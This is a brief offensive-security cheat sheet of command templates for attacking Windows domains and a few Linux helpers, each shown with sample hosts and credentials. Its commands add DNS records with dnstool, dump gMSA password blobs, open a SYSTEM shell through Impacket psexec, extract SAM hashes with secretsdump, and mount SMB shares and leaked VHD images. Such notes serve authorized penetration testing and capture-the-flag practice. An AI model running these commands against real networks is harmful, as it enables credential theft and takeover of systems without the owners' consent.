Useful Offensive Snippets

Windows

SMB Connect

smbclient -U <USER> //<HOST>/<SHARE>
smbclient -U Diddy.Doodat //pwned.com/Backup

Add DNS record kerberos

python3 dnstool.py -u '<DOMAIN>\<USER>' -p <PASSWORD> -r pwned.hacker.com -a add -t A -d <DOMAIN IP> <DNS IP>
python3 dnstool.py -u 'hacked\diddy.doodat' -p OMGJonathanScott -r pwned.hacker.com -a add -t A -d 10.10.10.12 86.32.12.233

Dump gMSA password blobs

python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>
python3 gMSADumper.py -u 'diddy.doodat' -p 'OMGJonathanScott' -d pwned.hacker.com

Mount SMB share on a Linux host

mount -t cifs //<HOST>/<SHARE> /tmp/mnt
mount -t cifs //128.11.2.121/Pwned /tmp/mnt

Shell from Linux with Impacket (psexec)

impacket-psexec -k -no-pass <DOMAIN>/<USER>@<HOST>
impacket-psexec -k -no-pass hacked.com/Administrator@dc.hacked.com

Dump SAM hashes from exported SAM/SYSTEM hives on Linux

impacket-secretsdump -sam SAM -system SYSTEM local

Linux

Fix Clock Skew Error

sudo ntpdate <NTP SERVER IP>
sudo ntpdate 10.11.1.211

Mount VHD

guestmount --add <IMAGE>.vhd --inspector --ro -v /tmp/vhd
guestmount --add leaked.vhd --inspector --ro -v /tmp/vhd
